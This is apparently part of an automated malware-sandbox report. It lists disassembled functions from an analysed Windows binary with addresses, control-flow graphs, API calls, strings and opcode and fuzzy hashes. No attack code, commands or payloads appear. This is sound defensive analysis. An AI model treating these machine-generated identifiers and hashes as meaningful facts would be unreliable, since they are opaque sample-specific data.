                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: Process$AffinityCurrent$AllocErrorGroupHighestInfoInformationLastMaskNodeNumaNumberObjectQuerySystem_wcsicmp
                            • String ID: PROCESSOR_COUNT
                            • API String ID: 296690692-4048346908
                            • Opcode ID: f854a702a83dc01c41646339c6b0099762c4a12ee8e6a0d15d954c5e394c61ba
                            • Instruction ID: 199e6ff6efa508534f322dfca60b04f5b6ea1362b21d13e4663fb1d5416c55eb
                            • Opcode Fuzzy Hash: f854a702a83dc01c41646339c6b0099762c4a12ee8e6a0d15d954c5e394c61ba
                            • Instruction Fuzzy Hash: D0319D33A3C742C6EA14BFA2D9D47BDE3A1EF44354FE10031D69D426A5EE2CE8088720
                            Function 00007FF774A06620 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Strings
                            • Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code., xrefs: 00007FF774A06726
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: ExceptionFailFastRaise$Sleep
                            • String ID: Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code.
                            • API String ID: 3706814929-926682358
                            • Opcode ID: 748c09927475cf9e349a911d070e2e85ba1b369a78d20386409e9d4058d69fe5
                            • Instruction ID: efe411ca03f2548ab94da37d7ffa9dae0ab1f3b323e80076f54c53cd7b991933
                            • Opcode Fuzzy Hash: 748c09927475cf9e349a911d070e2e85ba1b369a78d20386409e9d4058d69fe5
                            • Instruction Fuzzy Hash: F3417433A39B42D6EB95AF26E494779B390EB04B48F954036DA4D47360EF3DE450C361
                            Function 00007FF774A0B320 Relevance: 6.0, APIs: 4, Instructions: 26threadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: Thread$ChangeCloseCreateFindNotificationPriorityResume
                            • String ID:
                            • API String ID: 2150560229-0
                            • Opcode ID: 43130a00a2952a497caba751cbab80e0c5945ae47426b9584871a3a1cc0fd745
                            • Instruction ID: 16bcfccd5f07b6d2f98375d2702a76d7383dbe36f194829f86f528123acfd753
                            • Opcode Fuzzy Hash: 43130a00a2952a497caba751cbab80e0c5945ae47426b9584871a3a1cc0fd745
                            • Instruction Fuzzy Hash: 67E039A6A3D702C2EB18EF22AC58335A350BF99B85F984434CE4E06370EF3C95858610
                            Function 00007FF774A12080 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 119 7ff774a12080-7ff774a120b1 120 7ff774a120b7-7ff774a120d2 GetCurrentProcess call 7ff774a68be5 119->120 121 7ff774a1216f-7ff774a1218c GlobalMemoryStatusEx 119->121 120->121 132 7ff774a120d8-7ff774a120e0 120->132 123 7ff774a12212-7ff774a12215 121->123 124 7ff774a12192-7ff774a12195 121->124 125 7ff774a12217-7ff774a1221b 123->125 126 7ff774a1221e-7ff774a12221 123->126 128 7ff774a12197-7ff774a121a2 124->128 129 7ff774a12201-7ff774a12204 124->129 125->126 130 7ff774a1222b-7ff774a1222e 126->130 131 7ff774a12223-7ff774a12228 126->131 133 7ff774a121ab-7ff774a121bc 128->133 134 7ff774a121a4-7ff774a121a9 128->134 135 7ff774a12209-7ff774a1220c 129->135 136 7ff774a12206 129->136 137 7ff774a12238-7ff774a1225b call 7ff774a68fb0 130->137 138 7ff774a12230 130->138 131->130 139 7ff774a1214a-7ff774a1214f 132->139 140 7ff774a120e2-7ff774a120e8 132->140 141 7ff774a121c0-7ff774a121d1 133->141 134->141 135->137 142 7ff774a1220e-7ff774a12210 135->142 136->135 143 7ff774a12235 138->143 149 7ff774a12161-7ff774a12164 139->149 150 7ff774a12151-7ff774a12154 139->150 144 7ff774a120ea-7ff774a120ef 140->144 145 7ff774a120f1-7ff774a12105 140->145 147 7ff774a121da-7ff774a121ee 141->147 148 7ff774a121d3-7ff774a121d8 141->148 142->143 143->137 152 7ff774a12109-7ff774a1211a 144->152 145->152 154 7ff774a121f2-7ff774a121fe 147->154 148->154 149->137 151 7ff774a1216a 149->151 155 7ff774a1215b-7ff774a1215e 150->155 156 7ff774a12156-7ff774a12159 150->156 151->143 157 7ff774a1211c-7ff774a12121 152->157 158 7ff774a12123-7ff774a12137 152->158 154->129 155->149 156->149 159 7ff774a1213b-7ff774a12147 157->159 158->159 159->139
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: CurrentGlobalMemoryProcessStatus
                            • String ID: @
                            • API String ID: 3261791682-2766056989
                            • Opcode ID: 9126c160c7f3f8a979c28d89de266492a2cb26c761d1c6b8a32731156d037bec
                            • Instruction ID: 9a7b33b95e87c7025994b1234e4b8acd39086935db11204dba3895ee9e1005d8
                            • Opcode Fuzzy Hash: 9126c160c7f3f8a979c28d89de266492a2cb26c761d1c6b8a32731156d037bec
                            • Instruction Fuzzy Hash: 3241E173A3AB46C1E956DE279190B39D2726F49BC0F698B31DA0E36744FF3CE4918610
                            Function 00007FF774A404D0 Relevance: 5.1, APIs: 4, Instructions: 84COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • EnterCriticalSection.KERNEL32(?,00000000,00000001,00007FF774A2DA29), ref: 00007FF774A40510
                            • LeaveCriticalSection.KERNEL32(?,00000000,00000001,00007FF774A2DA29), ref: 00007FF774A40586
                            • EnterCriticalSection.KERNEL32(?,00000000,00000001,00007FF774A2DA29), ref: 00007FF774A405DE
                            • LeaveCriticalSection.KERNEL32(?,00000000,00000001,00007FF774A2DA29), ref: 00007FF774A40604
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: CriticalSection$EnterLeave
                            • String ID:
                            • API String ID: 3168844106-0
                            • Opcode ID: 8596cd8b17cfc4c9012a95026411ea1fb58e51e4c51ec36a2e9fd3798af9f9b3
                            • Instruction ID: 1734f939a54b17ea8ee51dca101e58f7a11338e160198eb27d3bc344dea14ac0
                            • Opcode Fuzzy Hash: 8596cd8b17cfc4c9012a95026411ea1fb58e51e4c51ec36a2e9fd3798af9f9b3
                            • Instruction Fuzzy Hash: 6A414E63D3C606D1EA11BF1AE480B79A3B0FF5A344FEA8436D94D462A1DF6DE4419332
                            Function 00007FF774A1CF30 Relevance: 4.7, APIs: 3, Instructions: 195threadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 229 7ff774a1cf30-7ff774a1cf5d 230 7ff774a1cf5f 229->230 231 7ff774a1cf66-7ff774a1cf6e 230->231 232 7ff774a1cf7c-7ff774a1cf9c 231->232 233 7ff774a1cf70-7ff774a1cf7a call 7ff774a40880 231->233 235 7ff774a1cfa2-7ff774a1cfa8 232->235 236 7ff774a1d093-7ff774a1d099 232->236 233->230 238 7ff774a1cfae 235->238 239 7ff774a1d07d-7ff774a1d088 235->239 240 7ff774a1d09b-7ff774a1d0a1 call 7ff774a23670 236->240 241 7ff774a1d0a6-7ff774a1d0a9 236->241 243 7ff774a1cfb0-7ff774a1cfb6 238->243 239->235 242 7ff774a1d08e 239->242 240->241 245 7ff774a1d16a-7ff774a1d174 call 7ff774a34b90 241->245 246 7ff774a1d0af-7ff774a1d0b6 241->246 242->236 248 7ff774a1cfb8-7ff774a1cfc0 243->248 249 7ff774a1d022-7ff774a1d032 call 7ff774a09750 243->249 259 7ff774a1d1dc-7ff774a1d1df 245->259 260 7ff774a1d176-7ff774a1d17c 245->260 250 7ff774a1d0bc-7ff774a1d0c4 246->250 251 7ff774a1d161-7ff774a1d168 246->251 248->249 256 7ff774a1cfc2-7ff774a1cfc9 248->256 270 7ff774a1d034-7ff774a1d03b 249->270 271 7ff774a1d056-7ff774a1d05e 249->271 250->251 252 7ff774a1d0ca-7ff774a1d0f4 250->252 251->245 253 7ff774a1d112-7ff774a1d126 call 7ff774a1dbe0 251->253 252->251 257 7ff774a1d0f6-7ff774a1d10d call 7ff774a3e2b0 252->257 265 7ff774a1d12b-7ff774a1d135 253->265 262 7ff774a1d019-7ff774a1d020 SwitchToThread 256->262 263 7ff774a1cfcb-7ff774a1cfd8 256->263 257->253 259->253 267 7ff774a1d1e5-7ff774a1d1fd call 7ff774a1d660 259->267 268 7ff774a1d17e-7ff774a1d181 260->268 269 7ff774a1d18d-7ff774a1d19d call 7ff774a406c0 260->269 266 7ff774a1d073-7ff774a1d077 262->266 272 7ff774a1cff8-7ff774a1cffc 263->272 273 7ff774a1cfda 263->273 265->231 279 7ff774a1d13b-7ff774a1d160 265->279 266->239 266->243 267->265 268->269 281 7ff774a1d183-7ff774a1d188 call 7ff774a23670 268->281 293 7ff774a1d1ab-7ff774a1d1b1 269->293 294 7ff774a1d19f-7ff774a1d1a9 call 7ff774a34b90 269->294 282 7ff774a1d04c-7ff774a1d051 call 7ff774a128e0 270->282 283 7ff774a1d03d-7ff774a1d043 270->283 276 7ff774a1d06a-7ff774a1d06c 271->276 277 7ff774a1d060-7ff774a1d065 call 7ff774a40880 271->277 272->266 278 7ff774a1cffe-7ff774a1d006 272->278 275 7ff774a1cfe0-7ff774a1cfe4 273->275 275->272 286 7ff774a1cfe6-7ff774a1cfee 275->286 276->266 288 7ff774a1d06e call 7ff774a096d0 276->288 277->276 278->266 289 7ff774a1d008-7ff774a1d017 call 7ff774a09750 SwitchToThread 278->289 281->269 282->271 283->282 292 7ff774a1d045-7ff774a1d04a SwitchToThread 283->292 286->272 295 7ff774a1cff0-7ff774a1cff6 286->295 288->266 289->276 292->271 299 7ff774a1d1bc-7ff774a1d1d7 call 7ff774a3e2b0 293->299 300 7ff774a1d1b3-7ff774a1d1b6 293->300 294->259 294->293 295->272 295->275 299->259 300->253 300->299
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: SwitchThread
                            • String ID:
                            • API String ID: 115865932-0
                            • Opcode ID: b53c1b8baf3fa961f42f9a93c026e3a91cc4469665a52e1080013d420c1a925c
                            • Instruction ID: 22b43d9be7ef45996d3fae904b0957393fd999873d4cd25897d88c3812f3b4a9
                            • Opcode Fuzzy Hash: b53c1b8baf3fa961f42f9a93c026e3a91cc4469665a52e1080013d420c1a925c
                            • Instruction Fuzzy Hash: A071EF23E3C203D6F654BF17A8C0E36A2B1AF40388FA54839D96E962D5DF3DF4418621
                            Function 00007FF774A12930 Relevance: 4.5, APIs: 3, Instructions: 34memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • VirtualAlloc.KERNELBASE(?,?,?,?,00000000,00007FF774A15348,?,?,0000000A,00007FF774A143A0,?,?,00000000,00007FF774A0EA91), ref: 00007FF774A12957
                            • GetCurrentProcess.KERNEL32(?,?,?,?,00000000,00007FF774A15348,?,?,0000000A,00007FF774A143A0,?,?,00000000,00007FF774A0EA91), ref: 00007FF774A12977
                            • VirtualAllocExNuma.KERNEL32 ref: 00007FF774A12998
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: AllocVirtual$CurrentNumaProcess
                            • String ID:
                            • API String ID: 647533253-0
                            • Opcode ID: 686b3994b09b840201f1684b8296069bddec3b68bb7cd25d79b3609eb5cb6e8f
                            • Instruction ID: e7462fd6629f78d5e0493f7d52dbb69539e8a3cdfe559bb60a857f00b6b27a0c
                            • Opcode Fuzzy Hash: 686b3994b09b840201f1684b8296069bddec3b68bb7cd25d79b3609eb5cb6e8f
                            • Instruction Fuzzy Hash: 98F0A472B28691C2EB209F1AF440629A760BB49FC4F584134EF8C17B68CB3DC5918700
                            Function 00007FF774A09F40 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 71COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: EventRegister
                            • String ID: gcConservative
                            • API String ID: 3840811365-1953527212
                            • Opcode ID: 0bd704104a13a76449dc93aebda2a80e695e757360b9318b75be9f098cee9c4f
                            • Instruction ID: c06a1a294763283e4632707ff310763a347a1a9c4056d27f0f425a9248cbacf1
                            • Opcode Fuzzy Hash: 0bd704104a13a76449dc93aebda2a80e695e757360b9318b75be9f098cee9c4f
                            • Instruction Fuzzy Hash: 0331F533A3A647E1EB00BF66E8C15A4A3A0EF48788F958436DA4D03261EF3DE555C771
                            Function 00007FF774A68ED4 Relevance: 3.0, APIs: 2, Instructions: 21COMMONLIBRARYCODE
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF774A68FD9,?,?,?,?,00007FF774A0DBC1,?,?,?,00007FF774A0E13C,00000000,00000020,?), ref: 00007FF774A68EEE
                            • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF774A68F04
                              • Part of subcall function 00007FF774A69A2C: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF774A69A35
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: Concurrency::cancel_current_taskmallocstd::bad_alloc::bad_alloc
                            • String ID:
                            • API String ID: 205171174-0
                            • Opcode ID: b0e683634f6cf977cd568e859ab9fb6e1e75df7de34bcf169af656f9c50744c0
                            • Instruction ID: 480a66591c779d36bac86bd65c972cc06086c90fe4b130217827926a496351d5
                            • Opcode Fuzzy Hash: b0e683634f6cf977cd568e859ab9fb6e1e75df7de34bcf169af656f9c50744c0
                            • Instruction Fuzzy Hash: 66E0B602E3B107E1FD287D6754E59B580880F59778EBE1778D93D092C6AD1CE8958132
                            Function 00007FF774A0B2E0 Relevance: 3.0, APIs: 2, Instructions: 18threadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: ChangeCloseCreateFindNotificationThread
                            • String ID:
                            • API String ID: 4060959955-0
                            • Opcode ID: 10e2c95deb48a9fa91c132fa6e8d2868e379d5a6b0bea3614ebc36bd565de11c
                            • Instruction ID: baa2ad425d5835dde14a48eaa7d44a361522a19a5ffc0213e49c0de3d7c35b25
                            • Opcode Fuzzy Hash: 10e2c95deb48a9fa91c132fa6e8d2868e379d5a6b0bea3614ebc36bd565de11c
                            • Instruction Fuzzy Hash: 43D0C2A2E2D741C2DB14EF722C0013567D0BF98B40FD14138D94D83330FE3C92018900
                            Function 00007FF774A26690 Relevance: 2.6, APIs: 2, Instructions: 107COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: CriticalSection$EnterLeave
                            • String ID:
                            • API String ID: 3168844106-0
                            • Opcode ID: 1a22502bf992a24a703f73c6a817279700c5c49892520407a1fa6d59b5a26f00
                            • Instruction ID: 69c8802d277f8c60e643973a4137293dda7dff8e8b0e12973e5873cb9efb96b8
                            • Opcode Fuzzy Hash: 1a22502bf992a24a703f73c6a817279700c5c49892520407a1fa6d59b5a26f00
                            • Instruction Fuzzy Hash: 8941B563A39A42D5EB10AF2BA880675A360EF45BF8FA54335DA3C576D5CF2DE041C360
                            Function 00007FF774A0FE40 Relevance: 2.6, APIs: 2, Instructions: 86memoryCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: AllocVirtual
                            • String ID:
                            • API String ID: 4275171209-0
                            • Opcode ID: 81eb4f473b5f6baa680c7093f92d2b26f8a37406559a141903ec7adff4e5ed1f
                            • Instruction ID: 117277565ddb7d6d146c26fb3075ecbce03523d97ee835a38ef23cc4f04b9327
                            • Opcode Fuzzy Hash: 81eb4f473b5f6baa680c7093f92d2b26f8a37406559a141903ec7adff4e5ed1f
                            • Instruction Fuzzy Hash: 9631E433B25B12C2E614EF27958052AA3A0EB45FD4FA48135EF4C17BE4EF78E4628350
                            Function 00007FF774A40630 Relevance: 2.5, APIs: 2, Instructions: 28COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00007FF774A129C0: VirtualFree.KERNELBASE ref: 00007FF774A129CA
                            • EnterCriticalSection.KERNEL32(?,?,?,00007FF774A266E9,?,?,?,00007FF774A2C70D), ref: 00007FF774A40662
                            • LeaveCriticalSection.KERNEL32(?,?,?,00007FF774A266E9,?,?,?,00007FF774A2C70D), ref: 00007FF774A4068C
                            Memory Dump Source
                            • Source File: 00000001.00000002.1278689171.00007FF774A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF774A00000, based on PE: true
                            • Associated: 00000001.00000002.1278222377.00007FF774A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279022919.00007FF774B3B000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279088365.00007FF774B9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C60000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C67000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279163521.00007FF774C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.1279219895.00007FF774C6F000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_7ff774a00000_C1ZsNxSer8.jbxd
                            Similarity
                            • API ID: CriticalSection$EnterFreeLeaveVirtual
                            • String ID:
                            • API String ID: 1320683145-0
                            • Opcode ID: 104b6b8d726536473a8dfb620195b120dc1c760eb9325624558afd6144496d8f
                            • Instruction ID: beba8af09d7dd64c63aab8e2218d15d8488c3bf65457ed241636683415543f8f
